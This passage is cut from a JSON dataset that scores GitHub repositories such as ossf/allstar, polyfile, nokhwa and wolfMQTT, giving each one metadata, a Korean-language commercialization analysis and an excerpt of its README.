협업 플랫폼 같은 구독형 웹 서비스의 기술 기반으로 활용\n2. **내부 업무 도구**: 회사 직원들이 ","readme_excerpt":"# 🐳 An example Rails + Docker app\n\nYou could use this example app as a base for your new project or as a guide to\nDockerize your existing Rails app.\n\nThe example app is minimal but it wires up a number of things you might use in\na real world Rails app, but at the same time it's not loaded up with a million\npersonal opinions.\n\nFor the Docker bits, everything included is an accumulation of [Docker best\npractices](https://nickjanetakis.com/blog/best-practices-around-production-ready-web-apps-with-docker-compose)\nbased on building and deploying dozens of assorted Dockerized web apps since\nlate 2014.\n\n**This app is using Rails 8.1.3 and Ruby 4.0.4**. The screenshot shows\n`X.X.X` since they get updated regularly:\n\n[![Screenshot](.github/docs/screenshot.jpg)](https://github.com/nickjj/docker-rails-example/blob/main/.github/docs/screenshot.jpg?raw=true)\n\n## 🧾 Table of contents\n\n- [Tech stack](#tech-stack)\n- [Main changes vs a newly generated Rails app](#main-changes-vs-a-newly-generated-rails-","composite_score":0.0093,"license_safety_tag":"safe"},{"name":"ossf/allstar","github_url":"https://github.com/ossf/allstar","stars":6,"language":"Go","license":"Apache-2.0","abandonment_months":0,"description":"# ossf/allstar 분석 보고서\n\n## 왜 보물인가\n오픈소스 프로젝트의 보안 관리를 자동으로 점검하고 개선하는 도구로, 소프트웨어 안전성을 효율적으로 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 깃허브 연동 웹 대시보드로 기업의 모든 오픈소스 프로젝트 보안 상태를 실시간 모니터링\n2. **내부 업무 도구**: 개발팀이","readme_excerpt":"[![OpenSSF Scorecard](https://api.scorecard.dev/projects/github.com/ossf/allstar/badge)](https://api.scorecard.dev/projects/github.com/ossf/allstar)\n\n<img align=\"right\" src=\"artwork/openssf_allstar_alt.png\" width=\"300\" height=\"400\">\n\n# **Allstar**\n\n## Overview\n\n-  [What Is Allstar?](#what-is-allstar)\n\n## What's new with Allstar\n\n- [whats-new.md](whats-new.md)\n\n## Disabling Unwanted Issues\n\n-  [Help! I'm getting issues created by Allstar and I don't want them!](#disabling-unwanted-issues-1)\n\n## Getting Started\n\n-  [Background](#background)\n-  [Org-Level Options](#org-level-options)\n-  [Installation Options](#installation-options)\n    - [Using the public Allstar app](#using-the-allstar-app)\n        - [Quickstart Installation](#quickstart-installation)\n        - [Manual Installation](#manual-installation)\n    - [Self-hosting Allstar](#self-hosting-allstar)\n        - [Running Allstar as a GitHub Action](#running-allstar-as-a-github-action)\n        - [Running Allstar as a service daemon](#r","composite_score":0.0093,"license_safety_tag":"safe"},{"name":"l1npengtul/nokhwa","github_url":"https://github.com/l1npengtul/nokhwa","stars":16,"language":"Rust","license":"Apache-2.0","abandonment_months":0,"description":"# nokhwa 프로젝트 분석\n\n## 왜 보물인가\n컴퓨터의 카메라를 간편하게 제어할 수 있는 도구로, 화상회의, 보안 카메라, 자동화 시스템 등 다양한 분야에서 필요로 하는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 화상 면접 플랫폼: 취업 준비생들을 대상으로 AI 면접 연습 서비스 제공\n\n**2. 내부 업무 도구**\n-","readme_excerpt":"[![cargo version](https://img.shields.io/crates/v/nokhwa.svg)](https://crates.io/crates/nokhwa) [![docs.rs version](https://img.shields.io/docsrs/nokhwa)](https://docs.rs/nokhwa/latest/nokhwa/)\n# nokhwa\nNokhwa(녹화): Korean word meaning \"to record\".\n\nA Simple-to-use, cross-platform Rust Webcam Capture Library\n\n## Using nokhwa\nNokhwa can be added to your crate by adding it to your `Cargo.toml`:\n```toml\n[dependencies.nokhwa]\nversion = \"0.10\"\n# Use the native input backends, enable WGPU integration\nfeatures = [\"input-native\", \"output-wgpu\"]\n\n# add this to enable exporting to a JPEG/PNG\n[dependencies.image]\nversion = \"0.25\"\nfeatures = [\"default-formats\"]\n```\n\nMost likely, you will only use functionality provided by the `Camera` struct. If you need lower-level access, you may instead opt to use the raw capture backends found at `nokhwa::backends::capture::*`.\n\n## Example\n```rust\n// first camera in system\nlet index = CameraIndex::Index(0); \n// request the absolute highest resolution CameraForm","composite_score":0.0092,"license_safety_tag":"safe"},{"name":"symfony/var-dumper","github_url":"https://github.com/symfony/var-dumper","stars":9,"language":"PHP","license":"mit","abandonment_months":1,"description":"# Symfony Var-Dumper 상품화 분석\n\n## 왜 보물인가\n프로그래머들이 코드 작성 중 데이터를 시각화하고 문제를 빠르게 찾을 수 있도록 돕는 개발자 필수 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 클라우드 기반 개발 환경**\n웹 브라우저에서 직접 코드를 작성하고 실행하는 서비스에서 데이터 분석 기능으로 통합할 수 있습니","readme_excerpt":"VarDumper Component\n===================\n\nThe VarDumper component provides mechanisms for walking through any arbitrary\nPHP variable. It provides a better `dump()` function that you can use instead\nof `var_dump()`.\n\nResources\n---------\n\n * [Documentation](https://symfony.com/doc/current/components/var_dumper/introduction.html)\n * [Contributing](https://symfony.com/doc/current/contributing/index.html)\n * [Report issues](https://github.com/symfony/symfony/issues) and\n   [send Pull Requests](https://github.com/symfony/symfony/pulls)\n   in the [main Symfony repository](https://github.com/symfony/symfony)\n","composite_score":0.0091,"license_safety_tag":"safe"},{"name":"elixir-protobuf/protobuf","github_url":"https://github.com/elixir-protobuf/protobuf","stars":5,"language":"Elixir","license":"MIT","abandonment_months":0,"description":"# Elixir Protobuf 저장소 분석\n\n## 왜 보물인가\n서로 다른 프로그램들이 효율적으로 대화할 수 있도록 돕는 통신 도구로, 금융·통신·물류 등 대규모 시스템에서 비용 절감과 속도 향상을 가져올 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **마이크로서비스 아키텍처 SaaS**: 여러 서비스가 빠르게 데이터를 주고받아야 하는 클라우드 플랫폼(","readme_excerpt":"# protobuf-elixir\n\n[![CI](https://github.com/elixir-protobuf/protobuf/actions/workflows/main.yml/badge.svg)](https://github.com/elixir-protobuf/protobuf/actions/workflows/main.yml)\n[![Coverage Status](https://coveralls.io/repos/github/elixir-protobuf/protobuf/badge.svg?branch=main)](https://coveralls.io/github/elixir-protobuf/protobuf?branch=main)\n\nA pure Elixir implementation of [Google Protobuf](https://developers.google.com/protocol-buffers/).\n\n## Why this instead of exprotobuf(gpb)?\n\nIt has some must-have and other cool features like:\n\n1. A protoc [plugin](https://developers.google.com/protocol-buffers/docs/cpptutorial#compiling-your-protocol-buffers) to generate Elixir code just like what other official libs do, which is powerful and reliable.\n2. Generate **simple and explicit** code with the power of Macro. See [test/support/test_msg.ex](https://github.com/tony612/protobuf-elixir/blob/master/test/support/test_msg.ex).\n3. Plugins support. Only [grpc](https://github.com/tony612/grp","composite_score":0.0091,"license_safety_tag":"safe"},{"name":"trailofbits/polyfile","github_url":"https://github.com/trailofbits/polyfile","stars":13,"language":"Python","license":"Apache-2.0","abandonment_months":1,"description":"# polyfile 저장소 분석\n\n## 왜 보물인가\n복잡한 파일 구조를 자동으로 분석하고 숨겨진 위협을 찾아내는 보안 검사 도구로, 기업의 사이버 공격 방어에 직접 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 파일 보안 검사 플랫폼**\n기업들이 클라우드에 업로드하는 파일의 안전성을 자동 검사해주는 웹 서비스로 운영 가능합니다","readme_excerpt":"# PolyFile\n<p align=\"center\">\n  <img src=\"logo/polyfile_name.png?raw=true\" width=\"256\" title=\"PolyFile\">\n</p>\n<br />\n\n[![PyPI version](https://badge.fury.io/py/polyfile.svg)](https://badge.fury.io/py/polyfile)\n[![Tests](https://github.com/trailofbits/polyfile/workflows/Tests/badge.svg)](https://github.com/trailofbits/polyfile/actions)\n[![Slack Status](https://slack.empirehacking.nyc/badge.svg)](https://slack.empirehacking.nyc)\n\nA utility to identify and map the semantic and syntactic structure of files,\nincluding polyglots, chimeras, and schizophrenic files. It has [a pure-Python implementation of libmagic](#file-support) and can act as a drop-in replacement for the [`file` command](https://github.com/file/file). However, unlike `file`, PolyFile can recursively identify embedded files, like [binwalk](https://github.com/ReFirmLabs/binwalk).\n\nPolyFile can be used in conjunction with its sister tool\n[PolyTracker](https://github.com/trailofbits/polytracker) for\n_Automated Lexical Annotatio","composite_score":0.009,"license_safety_tag":"safe"},{"name":"mikeizbicki/cmc-csci040","github_url":"https://github.com/mikeizbicki/cmc-csci040","stars":5,"language":"HTML","license":"unknown","abandonment_months":1,"description":"# mikeizbicki/cmc-csci040 분석\n\n## 왜 보물인가\n컴퓨터 과학 기초 교육 자료로, 프로그래밍을 배우려는 초보자들을 위한 체계적인 학습 커리큘럼을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼**: 코딩 스쿨이나 부트캠프에서 기초 강좌 커리큘럼으로 판매\n2. **기업 내부 교육**: IT 미경험자 직원들의 디지털 ","readme_excerpt":"## CSCI040: ~Computing for the Web~ Introduction to Hacking\n<!--\nhttps://www.bellingcat.com/resources/2024/03/01/using-open-source-internet-routing-tools-to-monitor-a-sanctioned-russian-bank/\n-->\n\n<center>\n<img width='100%' src=img/hacker-way.jpg />\n</center>\n\n## About the Instructor\n\n|||\n|-|-|\n| Name | Mike Izbicki (please call me Mike---[titles are lowkey insults to hackers](http://www.catb.org/jargon/html/appendixb.html)) |\n| Office | Adams 216 |\n| Office Hours | [see #372](https://github.com/mikeizbicki/cmc-csci040/issues/372) |\n| Zoom | [see #373](https://github.com/mikeizbicki/cmc-csci040/issues/373) |\n| Email | mizbicki@cmc.edu (you should probably [post a github issue](https://github.com/mikeizbicki/cmc-csci040/issues) instead of email) |\n| Webpage | <https://izbicki.me> |\n| Research | Machine Learning (see <https://izbicki.me/research.html> for some past projects) |\n\nFun facts:\n1. grew up in San Clemente (~1 hr south of Claremont on the beach)\n1. 7 years in the US Navy\n    1. ","composite_score":0.0088,"license_safety_tag":"unknown"},{"name":"farrokhi/dnsdiag","github_url":"https://github.com/farrokhi/dnsdiag","stars":5,"language":"Python","license":"bsd-2-clause","abandonment_months":1,"description":"# dnsdiag 상용화 분석\n\n## 왜 보물인가\n인터넷 접속이 느리거나 끊길 때 원인을 빠르게 진단해주는 도구로, 모든 조직의 네트워크 문제 해결 시간을 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 웹 기반 진단 플랫폼 - 기업들이 브라우저에서 네트워크 문제를 자동으로 감지하고 리포트받기\n2. **내부 업무 도구**: ","readme_excerpt":"[![PyPI](https://img.shields.io/pypi/v/dnsdiag.svg?maxAge=8600)](https://pypi.python.org/pypi/dnsdiag/) [![PyPI](https://img.shields.io/pypi/l/dnsdiag.svg?maxAge=8600)]() [![Downloads](https://static.pepy.tech/personalized-badge/dnsdiag?period=total&units=international_system&left_color=grey&right_color=blue&left_text=PyPi%20Downloads)](https://pepy.tech/project/dnsdiag) [![Downloads](https://static.pepy.tech/badge/dnsdiag/month)](https://pepy.tech/project/dnsdiag) [![PyPI](https://img.shields.io/pypi/pyversions/dnsdiag.svg?maxAge=8600)]() [![Docker Pulls](https://img.shields.io/docker/pulls/farrokhi/dnsdiag)](https://hub.docker.com/r/farrokhi/dnsdiag) [![GitHub stars](https://img.shields.io/github/stars/farrokhi/dnsdiag.svg?style=social&label=Star&maxAge=8600)](https://github.com/farrokhi/dnsdiag/stargazers) \n\nDNS Measurement, Troubleshooting and Security Auditing Toolset\n===============================================================\n\nHave you ever wondered if your ISP is [intercepti","composite_score":0.0086,"license_safety_tag":"safe"},{"name":"andreroggeri/pynubank","github_url":"https://github.com/andreroggeri/pynubank","stars":5,"language":"Python","license":"mit","abandonment_months":0,"description":"# PyNuBank 프로젝트 분석\n\n## 왜 보물인가\n브라질의 인기 있는 핀테크 서비스(누뱅크)와 자동으로 연결되어 계좌 정보, 거래 내역, 카드 사용량을 프로그래밍으로 관리할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **가계부 자동화 SaaS**: 사용자가 누뱅크 계정을 연결하면 자동으로 지출을 분류·추적하는 서비스\n- **기업 경비 관리 도구","readme_excerpt":"# pynubank\n[![Python package](https://github.com/andreroggeri/pynubank/actions/workflows/build.yml/badge.svg)](https://github.com/andreroggeri/pynubank/actions/workflows/build.yml)\n![PyPI - Python Version](https://img.shields.io/pypi/pyversions/pynubank)\n[![PyPI version](https://badge.fury.io/py/pynubank.svg)](https://badge.fury.io/py/pynubank)\n[![Coverage Status](https://coveralls.io/repos/github/andreroggeri/pynubank/badge.svg?branch=master)](https://coveralls.io/github/andreroggeri/pynubank?branch=master)\n[![Maintainability](https://api.codeclimate.com/v1/badges/e550387e85d315a212af/maintainability)](https://codeclimate.com/github/andreroggeri/pynubank/maintainability) [![Join the chat at https://gitter.im/pynubank/pynubank](https://badges.gitter.im/pynubank/pynubank.svg)](https://gitter.im/pynubank/pynubank?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\nAcesse seus extratos do Nubank pelo Python ([Baseado na versão js](https://github.com/Astrocoders/nub","composite_score":0.0083,"license_safety_tag":"safe"},{"name":"jonnor/embeddedml","github_url":"https://github.com/jonnor/embeddedml","stars":310,"language":"Jupyter Notebook","license":"unknown","abandonment_months":0,"description":"# embeddedml 저장소 분석\n\n## 왜 보물인가\n스마트폰이나 작은 기기에서도 작동하는 인공지능 기술을 쉽게 만들 수 있도록 돕는 오픈소스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 스마트폰 앱에 내장된 음성 인식, 얼굴 인식 기능을 제공하는 구독형 개발 플랫폼\n- **내부 업무 도구**: 제조업체의 공장 자동화 시스템에서","readme_excerpt":"# Machine learning on embedded devices\n\nFocused primarily on running inference/prediction/feed-forward part on a microcontroller (or small embedded device).\nTraining phase can run on a standard computer/server, using existing tools as much as possible.\n\n# Background\n\n## What and when to use machine learning\n\nThe defaults right now are to do conventional signal processing (no learning) in sensor,\nand stream raw data to the cloud for storage and processing. Machine learning happens in the cloud.\nIf gateways are used, they mostly forward communication (no data processing). \n\nOn-edge processing valueable when\n\n* Local response needed. Autonomy\n* Adaptable response needed. Over time, in context.\n* Low/predictable latency needed\n* Sending raw sensor data has privacy implications.\nAudio, video.\n* Unreliable connection\n* High bandwidth sensor input.\nAudio, video, accelerometer/IMU, current sensor, radiowaves.\n* Low bandwidth algorithm output\n* Events of interest are rare\n* Low energy usage nee","composite_score":0.0081,"license_safety_tag":"unknown"},{"name":"apptainer/apptainer","github_url":"https://github.com/apptainer/apptainer","stars":19,"language":"Go","license":"NOASSERTION","abandonment_months":0,"description":"# Apptainer 저장소 분석\n\n## 왜 보물인가\n컴퓨터 프로그램들을 어떤 환경에서든 동일하게 실행할 수 있도록 패킹해주는 핵심 도구로, 대규모 과학 연구와 클라우드 산업에서 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **과학 연구 SaaS**: 대학과 연구기관이 복잡한 계산 작업을 클라우드에서 실행하고 비용을 청구하는 온라인 서비스\n2. **제약회","readme_excerpt":"# Apptainer\n\n[![CI](https://github.com/apptainer/apptainer/actions/workflows/ci.yml/badge.svg)](https://github.com/apptainer/apptainer/actions/workflows/ci.yml)\n[![Go Reference](https://pkg.go.dev/badge/pkg.golang.dev/github.com/apptainer/apptainer.svg)](https://pkg.go.dev/github.com/apptainer/apptainer)\n[![Go Report Card](https://goreportcard.com/badge/github.com/apptainer/apptainer)](https://goreportcard.com/report/github.com/apptainer/apptainer)\n\n- [Documentation](https://apptainer.org/docs/)\n- [Support](#support)\n- [Community Meetings / Minutes / Roadmap](https://drive.google.com/drive/u/0/folders/1npfBhIDxqeJIUHZ0tMeuHPvc_iB4T2B6)\n- [Project License](LICENSE.md)\n- [Guidelines for Contributing](CONTRIBUTING.md)\n- [Code of Conduct](CODE_OF_CONDUCT.md)\n- [Citation](#citing-apptainer)\n\n## What is Apptainer?\n\nApptainer is an open source container platform designed to be simple, fast,\nand secure. Many container platforms are available, but Apptainer is designed\nfor ease-of-use on shared","composite_score":0.0081,"license_safety_tag":"unknown"},{"name":"henkelmax/simple-voice-chat","github_url":"https://github.com/henkelmax/simple-voice-chat","stars":6,"language":"Java","license":"unknown","abandonment_months":0,"description":"# Simple Voice Chat 저장소 분석\n\n## 왜 보물인가\n게임이나 앱에서 사용자들이 **음성으로 대화할 수 있는 기능을 쉽게 만들 수 있는 도구**입니다.\n\n## 어디에 쓸 수 있나\n\n1. **게임 커뮤니티 플랫폼**: 멀티플레이 게임에서 플레이어들이 마이크로 실시간 통화하는 기능 제공\n2. **원격 협업 도구**: 팀 회의나 프로젝트 협업 시 ","readme_excerpt":"[Modrinth](https://modrinth.com/mod/simple-voice-chat)\n|\n[CurseForge](https://legacy.curseforge.com/minecraft/mc-mods/simple-voice-chat)\n|\n[Discord](https://discord.gg/4dH2zwTmyX)\n|\n[Wiki](https://modrepo.de/minecraft/voicechat/wiki)\n|\n[FAQ](https://modrepo.de/minecraft/voicechat/faq)\n|\n[Credits](https://modrepo.de/minecraft/voicechat/credits)\n|\n[API](https://modrepo.de/minecraft/voicechat/api)\n\n# Simple Voice Chat\n\nA proximity voice chat for Minecraft with a variety of [addons](https://modrepo.de/minecraft/voicechat/addons) that offer additional features and functionalities.\n\n:warning: **NOTE** This mod requires special setup on the server in order to work.\nPlease read the [wiki](https://modrepo.de/minecraft/voicechat/wiki/setup) for more information.\n\n<p align=\"center\">\n    <a href=\"https://discord.gg/4dH2zwTmyX\">\n        <img src=\"assets/discord.svg\" width=\"300\">\n    </a>\n    <br/>\n    <i>Please join the Discord if you have questions!</i>\n</p>\n\n## Downloads\n\n- [Fabric](https://modri","composite_score":0.0079,"license_safety_tag":"unknown"},{"name":"symfony/event-dispatcher","github_url":"https://github.com/symfony/event-dispatcher","stars":11,"language":"PHP","license":"mit","abandonment_months":1,"description":"# Symfony Event Dispatcher 분석\n\n## 왜 보물인가\n웹 애플리케이션에서 여러 기능들이 서로 영향을 주지 않으면서도 필요할 때 소통할 수 있게 해주는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객이 주문할 때마다 자동으로 이메일, 결제, 배송 시스템이 동시에 작동하는 전자상거래 플랫폼\n2. **내부 업무","readme_excerpt":"EventDispatcher Component\n=========================\n\nThe EventDispatcher component provides tools that allow your application\ncomponents to communicate with each other by dispatching events and listening to\nthem.\n\nResources\n---------\n\n * [Documentation](https://symfony.com/doc/current/components/event_dispatcher.html)\n * [Contributing](https://symfony.com/doc/current/contributing/index.html)\n * [Report issues](https://github.com/symfony/symfony/issues) and\n   [send Pull Requests](https://github.com/symfony/symfony/pulls)\n   in the [main Symfony repository](https://github.com/symfony/symfony)\n","composite_score":0.0078,"license_safety_tag":"safe"},{"name":"deepmind/android_env","github_url":"https://github.com/deepmind/android_env","stars":72,"language":"Python","license":"apache-2.0","abandonment_months":0,"description":"# DeepMind Android Env 상용화 분석\n\n## 왜 보물인가\n스마트폰을 자동으로 조작하는 AI 기술로, 반복적인 모바일 작업을 인간 개입 없이 처리할 수 있게 만드는 핵심 엔진입니다.\n\n## 어디에 쓸 수 있나\n\n1. **모바일 앱 자동 테스팅 SaaS**: 개발사들이 신규 앱 출시 전 자동으로 버그를 찾아주는 클라우드 서비스\n2. **기업 R","readme_excerpt":"\n# AndroidEnv - The Android Learning Environment\n\n<img align=\"right\" src=\"docs/images/device_control.gif\" width=\"160\" height=\"240\">\n\n[AndroidEnv](https://github.com/deepmind/android_env) is a Python library that\nexposes an [Android](https://www.android.com/) device as a Reinforcement\nLearning (RL) environment. The library provides a flexible platform for defining\ncustom tasks on top of the Android Operating System, including any Android\napplication. Agents interact with the device through a universal action\ninterface - the touchscreen - by sending localized touch and lift events to the\nsystem. The library processes these events and returns pixel observations and\nrewards as provided by specific [task definitions](docs/tasks_guide.md). For\nexample, rewards might be given for events such as successfully scrolling down a\npage, sending an email, or achieving some score in a game, depending on the\nresearch purpose and how the user configures the task.\n\n[![tests](https://github.com/deepmind/a","composite_score":0.0078,"license_safety_tag":"safe"},{"name":"nucleic/enaml","github_url":"https://github.com/nucleic/enaml","stars":20,"language":"Python","license":"NOASSERTION","abandonment_months":0,"description":"# nucleic/enaml 평가 보고서\n\n## 왜 보물인가\n사용자 인터페이스를 만드는 과정을 획기적으로 단순화하는 오픈소스 도구로, 복잡한 화면 설계를 누구나 쉽게 구현할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **과학 데이터 분석 SaaS**: 연구자들이 복잡한 실험 데이터를 시각화하고 분석하는 웹 서비스로 판매\n2. **내부 업무 도구**: 기","readme_excerpt":"Welcome to Enaml\n================\n\n.. image:: https://github.com/nucleic/enaml/workflows/Continuous%20Integration/badge.svg\n    :target: https://github.com/nucleic/enaml/actions\n.. image:: https://ci.appveyor.com/api/projects/status/p2bapt3y6n7xixcl?svg=true\n    :target: https://ci.appveyor.com/project/nucleic/enaml\n    :alt: Appveyor Build Status\n.. image:: https://codecov.io/gh/nucleic/enaml/branch/main/graph/badge.svg\n    :target: https://codecov.io/gh/nucleic/enaml\n    :alt: Code Coverage Status\n.. image:: https://github.com/nucleic/enaml/workflows/Documentation%20building/badge.svg\n    :target: https://github.com/nucleic/enaml/actions\n.. image:: https://readthedocs.org/projects/enaml/badge/?version=latest\n    :target: http://enaml.readthedocs.io/en/latest/?badge=latest\n    :alt: Documentation Status\n.. image:: https://img.shields.io/pypi/v/enaml.svg\n    :target: https://pypi.org/project/enaml/\n    :alt: PyPI version\n\nEnaml is a programming language and framework for creating profe","composite_score":0.0077,"license_safety_tag":"unknown"},{"name":"iamvishnusankar/next-sitemap","github_url":"https://github.com/iamvishnusankar/next-sitemap","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# next-sitemap 상품화 분석\n\n## 왜 보물인가\n웹사이트가 검색엔진에 잘 나타나도록 돕는 기술로, 온라인 사업을 하는 모든 기업에게 필수적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 쇼핑몰 운영자들이 자신의 온라인 매장을 구글·네이버에 자동으로 등록하는 월 구독 서비스\n2. **내부 업무 도구**: 대규모 전자상","readme_excerpt":"[![BANNER](./assets/banner.svg)](https://vercel.com/?utm_source=next-sitemap&utm_campaign=oss)\n\n<div align=\"center\">\n\n[![Build Status](https://dev.azure.com/iamvishnusankar/Public/_apis/build/status/iamvishnusankar.next-sitemap?branchName=master)](https://dev.azure.com/iamvishnusankar/Public/_build/latest?definitionId=126&branchName=master)\n[![npm version](https://badge.fury.io/js/next-sitemap.svg)](https://badge.fury.io/js/next-sitemap)\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat-square)](https://github.com/iamvishnusankar/next-sitemap/pulls)\n<a href=\"https://twitter.com/intent/follow?screen_name=iamvishnusankar\">\n<img src=\"https://img.shields.io/twitter/follow/iamvishnusankar?style=social&logo=twitter\" alt=\"follow on Twitter\">\n</a>\n\n</div>\n\n## Table of contents\n\n- [Getting started](#getting-started)\n  - [Installation](#installation)\n  - [Create config file](#create-config-file)\n  - [Building sitemaps](#building-sitemaps)\n    - [Custom config fi","composite_score":0.0077,"license_safety_tag":"safe"},{"name":"golang-queue/queue","github_url":"https://github.com/golang-queue/queue","stars":6,"language":"Go","license":"MIT","abandonment_months":1,"description":"# golang-queue/queue 상용화 분석\n\n## 왜 보물인가\n작업을 순서대로 처리하는 기본 기능을 심플하게 구현한 도구로, 복잡한 시스템에서 작업 흐름을 안정적으로 관리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **이메일/SMS 발송 서비스**: 고객사가 대량의 메시지를 보낼 때 순서를 보장하면서 안정적으로 처리\n2. **주문 처리 플랫폼","readme_excerpt":"# Queue\n\n[![CodeQL](https://github.com/golang-queue/queue/actions/workflows/codeql.yaml/badge.svg)](https://github.com/golang-queue/queue/actions/workflows/codeql.yaml)\n[![Run Tests](https://github.com/golang-queue/queue/actions/workflows/go.yml/badge.svg)](https://github.com/golang-queue/queue/actions/workflows/go.yml)\n[![codecov](https://codecov.io/gh/golang-queue/queue/branch/master/graph/badge.svg?token=SSo3mHejOE)](https://codecov.io/gh/golang-queue/queue)\n\n[繁體中文](./README.zh-tw.md) | [简体中文](./README.zh-cn.md)\n\nQueue is a Golang library designed to help you create and manage a pool of Goroutines (lightweight threads). It allows you to efficiently run multiple tasks in parallel, utilizing the full CPU capacity of your machine.\n\n## Features\n\n- [x] Supports [Circular buffer](https://en.wikipedia.org/wiki/Circular_buffer) queues.\n- [x] Integrates with [NSQ](https://nsq.io/) for real-time distributed messaging.\n- [x] Integrates with [NATS](https://nats.io/) for adaptive edge and distri","composite_score":0.0076,"license_safety_tag":"safe"},{"name":"SergiX44/Nutgram","github_url":"https://github.com/SergiX44/Nutgram","stars":25,"language":"PHP","license":"MIT","abandonment_months":1,"description":"# Nutgram 저장소 분석\n\n## 왜 보물인가\n텔레그램 봇을 만드는 복잡한 작업을 간단하게 자동화해주는 도구로, 누구나 쉽게 대화형 서비스를 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **고객 상담 봇 SaaS**: 기업들이 텔레그램을 통해 자동 응답 챗봇을 구축하고 월 구독료를 내도록 제공\n2. **회사 내부 업무 도구**: HR, 급여, ","readme_excerpt":"[![SWUbanner](https://raw.githubusercontent.com/vshymanskyy/StandWithUkraine/main/banner2-direct.svg)](https://supportukrainenow.org/)\n\n------\n\n<p align=\"center\">\n  <img src=\"https://i.imgur.com/yrd8jr2.png\" width=\"400px\">\n</p>\n\n[![API](https://img.shields.io/badge/Telegram%20Bot%20API-10.0%09--%20May%208,%202026-28a8ea.svg?logo=telegram)](https://core.telegram.org/bots/api)\n[![Latest Version on Packagist](https://img.shields.io/packagist/v/nutgram/nutgram.svg?label=composer&logo=composer)](https://packagist.org/packages/nutgram/nutgram)\n![PHP](https://img.shields.io/packagist/dependency-v/nutgram/nutgram/php?logo=php)\n![License](https://img.shields.io/github/license/nutgram/nutgram)\n\n[![Packagist Downloads](https://img.shields.io/packagist/dm/nutgram/nutgram)](https://packagist.org/packages/nutgram/nutgram)\n[![Packagist Downloads](https://img.shields.io/packagist/dt/nutgram/nutgram)](https://packagist.org/packages/nutgram/nutgram)\n[![GitHub Issues](https://img.shields.io/github/issues","composite_score":0.0076,"license_safety_tag":"safe"},{"name":"bridgecrewio/yor","github_url":"https://github.com/bridgecrewio/yor","stars":10,"language":"Go","license":"Apache-2.0","abandonment_months":0,"description":"# Yor 저장소 분석\n\n## 왜 보물인가\n클라우드 서비스 사용 현황을 자동으로 추적하고 관리하는 도구로, 기업들이 숨겨진 비용 낭비를 발견할 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업용 클라우드 비용 최적화 플랫폼 (예: AWS, Azure 사용 현황 모니터링 서비스)\n2. **내부 업무 도구**: 대규모 기업의 ","readme_excerpt":"<img src=\"https://raw.githubusercontent.com/bridgecrewio/yor/master/docs/yor-logo.png?\" width=\"350\">\n\n![Coverage](https://img.shields.io/badge/Coverage-81.2%25-brightgreen)\n![golangci-lint](https://github.com/bridgecrewio/yor/workflows/tests/badge.svg)\n[![security](https://github.com/bridgecrewio/yor/actions/workflows/security.yml/badge.svg)](https://github.com/bridgecrewio/yor/actions/workflows/security.yml)\n[![slack-community](https://img.shields.io/badge/Slack-4A154B?style=plastic&logo=slack&logoColor=white)](https://codifiedsecurity.slack.com/)\n[![Go Report Card](https://goreportcard.com/badge/github.com/bridgecrewio/yor)](https://goreportcard.com/report/github.com/bridgecrewio/yor)\n[![Go Reference](https://pkg.go.dev/badge/github.com/bridgecrewio/yor.svg)](https://pkg.go.dev/github.com/bridgecrewio/yor)\n[![Docker pulls](https://img.shields.io/docker/pulls/bridgecrew/yor.svg)](https://hub.docker.com/r/bridgecrew/yor)\n[![Chocolatey downloads](https://img.shields.io/chocolatey/dt/yor","composite_score":0.0075,"license_safety_tag":"safe"},{"name":"wolfSSL/wolfMQTT","github_url":"https://github.com/wolfSSL/wolfMQTT","stars":6,"language":"C","license":"gpl-2.0","abandonment_months":0,"description":"# wolfSSL/wolfMQTT 분석 보고서\n\n## 왜 보물인가\n사물인터넷(IoT) 기기들이 안전하게 메시지를 주고받을 수 있게 도와주는 핵심 기술로, 스마트홈·산업용 센서·의료기기 등에 광범위하게 필요합니다.\n\n## 어디에 쓸 수 있나\n1. **IoT 플랫폼 SaaS**: 스마트팩토리 센서 통신을 위한 안전한 메시징 서비스 제공\n2. **내부 업무 도구","readme_excerpt":"# wolfMQTT\n\nThis is an implementation of the MQTT Client written in C for embedded use, which supports SSL/TLS via the wolfSSL library. This library was built from the ground up to be multi-platform, space conscious and extensible. Integrates with wolfSSL to provide TLS support.\n\nFor details on wolfMQTT [see the wolfMQTT Manual](https://www.wolfssl.com/documentation/manuals/wolfmqtt/wolfMQTT-Manual.pdf).\n\n## Building\n\n### Mac/Linux/Unix\n\n1. `./autogen.sh` (if cloned from GitHub)\n2. `./configure` (to see a list of build options use `./configure --help`)\n3. `make`\n4. `sudo make install`\n\nNotes:\n* If `wolfssl` was recently installed, run `sudo ldconfig` to update the linker cache.\n* Debug messages can be enabled using `--enable-debug` or `--enable-debug=verbose` (for extra logging).\n* For a list of build options run `./configure --help`.\n* The build options are generated in a file here: `wolfmqtt/options.h`.\n\n### Windows Visual Studio\n\nFor building wolfMQTT with TLS support in Visual Stud","composite_score":0.0075,"license_safety_tag":"restricted"},{"name":"sergiodxa/remix-auth","github_url":"https://github.com/sergiodxa/remix-auth","stars":17,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# remix-auth 사업화 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 사용자 로그인/회원가입 기능을 쉽게 만들 수 있는 도구로, 개발자들의 반복 작업을 